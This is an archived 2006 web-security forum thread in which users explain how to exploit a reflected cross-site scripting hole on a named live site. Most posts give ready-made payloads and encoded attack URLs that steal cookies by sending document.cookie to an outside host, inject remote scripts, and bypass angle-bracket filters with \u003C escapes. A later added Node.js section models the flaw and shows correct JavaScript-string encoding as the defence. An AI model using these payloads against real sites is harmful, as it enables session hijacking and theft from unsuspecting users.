Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
What can you do with these types of XSS holes?
Posted by: Delixe
Date: October 17, 2006 10:41PM

Say you have found an XSS hole that allows you to do alert(), document.location yet you can't explicitly put <script> tags within the URL. What other actions can you do? I feel limited in this XSS hole to only those things.

For example:
var s=alert('hello');

that's in the URL and it executes the alert but what else can you do?




Re: What can you do with these types of XSS holes?
Posted by: maluc
Date: October 18, 2006 02:39AM

Using this example to demonstrate: http://www.skem9.com/search.php?wh=Layouts&keywords=';alert('XSS');a=' which was disclosed by unsticky on the So It Begins thread: http://sla.ckers.org/forum/read.php?3,44,1758#msg-1758 . It uses the injection
';alert('XSS');a=' .. as simplified as an injection gets, so a good example link

They're already in a <script> tag so an attacker's first option is to put the entire payload (malicious script that steals cookies, performs CSRF, spoofs/defaces a page, sniffs a login form, what have you) in the URL. Easiest example:
';document.write('Got your cookies.<img src="http://evil.com/cookiestealer.php?'+document.cookie+'">');a='
They'll have to encode the +'s to %2B first though: http://www.skem9.com/search.php?wh=Layouts&keywords=';document.write('Got%20your%20cookies.%3Cimg%20src=%22http://evil.com/cookiestealer.php?'%2Bdocument.cookie%2b'%22%3E');a='a

Assuming they didn't want to overwrite the page:
';i=new Image();i.src='http://mrsunshine/cookiestealer.php?'+document.cookie;a='
(they don't actually have to include document.body.appendChild(i), because it sends the GET request as soon as the .src is set.)

Encode the + and test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';i=new%20Image();i.src='http://evil.com/cookiestealer.php?'%2Bdocument.cookie;a='a . If you want to verify it yourself and don't have a webserver, try WhiteAcid's http://ccl.whiteacid.org/ logger

Now that's all fine and dandy.. but say we wanted to do some complicated CSRFing which'll require a lot of script. If you're expecting someone to click this link (or just for the sake of manageability and updating), you obviously can't have a mile long URL. So how about a way to include a remote script:
';i=document.createElement('script');i.src='http://ha.ckers.org/s.js';document.body.appendChild(i);a='
(this time around, appendChild is required..)


Test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';i=document.createElement('script');i.src='http://ha.ckers.org/s.js';document.body.appendChild(i);a='a

With a remote script you can add all the code you want, and with a reasonably short enough URL. There are even shorter ways to implement this however, such as with:
';document.body.innerHTML+='<script src=http://ha.ckers.org/s.js>';a='

Encode + and Test it: http://www.skem9.com/search.php?wh=Layouts&keywords=';document.body.innerHTML%2B='%3Cscript%20src=http://ha.ckers.org/s.js%3E';a='a .. uh oh. Nothing happened. This is because skem9.com filters < and > to &lt; and &gt;. So it's not usable like this without a String.fromCharCode(60) or unescape('%253C')

There's a lot of ways to sex a midget - i'm partial to reverse cowgirl - but createElement('script') is good too. Ultimately which one you choose depends on whether or not it requires them to click a link to it, what filter the page employs, and personal preference. But these should get you started.

-maluc

Re: What can you do with these types of XSS holes?
Posted by: rsnake
Date: October 18, 2006 10:41AM

Don't forget you can encode open and close angle brackets in JavaScript like so:

document.write("\u003Cscript src=http://ha.ckers.org/xss.js\u003E\u003C/script\u003E");

- RSnake
Gotta love it. http://ha.ckers.org
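
As an added example (not code from the thread, from skem9.com, or from ha.ckers.org), here is a Node.js model of the page maluc is injecting into, covering both his `';...;a='` breakout and RSnake's `\u003C` point. It assumes the page writes the keywords parameter into a JavaScript string literal inside <script>, and that the only filter is the `<` to `&lt;` / `>` to `&gt;` replacement maluc observed; the template shape, the encoder and the stub alert() are all assumptions made for the example. The script body is evaluated with a stub alert() that only records its argument, so the effect of each payload can be observed without touching a real page.

```javascript
// Added example (not code from the thread, skem9.com or ha.ckers.org): a Node.js
// model of a search page that drops the "keywords" parameter into a JavaScript
// string literal, with the weak and the correct encoder side by side. The
// template shape and the encoder are assumptions made for the example.

// The filter maluc describes on skem9.com: only < and > are touched.
function htmlEntityOnly(input) {
  return input.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Encoder for a JavaScript string-literal context: every character outside a
// small safe alphabet becomes a \uXXXX escape, so quotes, backslashes and angle
// brackets can only ever be string data. charCodeAt() yields UTF-16 code units,
// so characters outside the BMP become two escapes, which the parser accepts.
function encodeForJsString(input) {
  return input.replace(/[^A-Za-z0-9 ,._-]/g, function (ch) {
    return '\\u' + ('0000' + ch.charCodeAt(0).toString(16)).slice(-4);
  });
}

// Same page shape, different encoder. Both wrap the value in single quotes.
function renderVulnerable(keywords) {
  return "<script>var s='" + htmlEntityOnly(keywords) + "';</script>";
}
function renderHardened(keywords) {
  return "<script>var s='" + encodeForJsString(keywords) + "';</script>";
}

// Parse and run the script body the way a browser would, but with a stub
// alert() that only records its argument and a local `a` so the breakout
// payload's trailing assignment has somewhere harmless to go. Returns the
// value the literal actually produced and any alert() calls that fired.
function runScript(html) {
  var body = html.slice('<script>'.length, -'</script>'.length);
  var alerts = [];
  var stubAlert = function (msg) { alerts.push(String(msg)); };
  var s = new Function('alert', 'a', body + '\nreturn s;')(stubAlert, undefined);
  return { s: s, alerts: alerts };
}

// Constructed inputs: maluc's breakout, and RSnake's escaped angle brackets
// as the attacker would type them (a literal backslash, u, 0, 0, 3, C).
var BREAKOUT = "';alert('XSS');a='";
var ESCAPED_TAG = '\\u003Cscript src=http://ha.ckers.org/xss.js\\u003E';

// Stand-alone demo: shows what each template leaves in `s` and whether the
// injected alert() ran. With entity-only encoding the breakout truncates the
// literal and fires alert('XSS'), and the \u003C input comes out as a real
// '<' even though the filter "handled" angle brackets. The hardened template
// round-trips both inputs as plain string data and nothing fires.
function demo() {
  [BREAKOUT, ESCAPED_TAG].forEach(function (payload) {
    console.log('input          :', payload);
    console.log('entity-only    :', runScript(renderVulnerable(payload)));
    console.log('js-string enc. :', runScript(renderHardened(payload)));
  });
}
demo();
```

Run it with `node`. The defender's takeaway is that HTML-entity encoding is the wrong encoder for a JavaScript string context: it never touches the quote that terminates the literal, and it never touches the backslash, so `\u003C` passes the filter intact and the JavaScript parser turns it back into `<` before document.write() ever sees it. Escaping everything outside a safe alphabet as `\uXXXX` (or JSON-encoding the value and then escaping `<`, `>`, `&` and U+2028/U+2029 the same way) closes the quote breakout and the escape-sequence bypass at once.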

Re: What can you do with these types of XSS holes?
Posted by: maluc
Date: October 18, 2006 07:50PM

oh, i didn't know javascript would unencode those.. nifty. So yes, try that rather than unescape() or String.fromCharCode() if they're necessary.

-maluc

Re: What can you do with these types of XSS holes?
Posted by: rsnake
Date: October 19, 2006 11:05AM

I think any would work... where my method falls down is if they don't allow slashes and quotes... so each have their time and place.

- RSnake
Gotta love it. http://ha.ckers.org
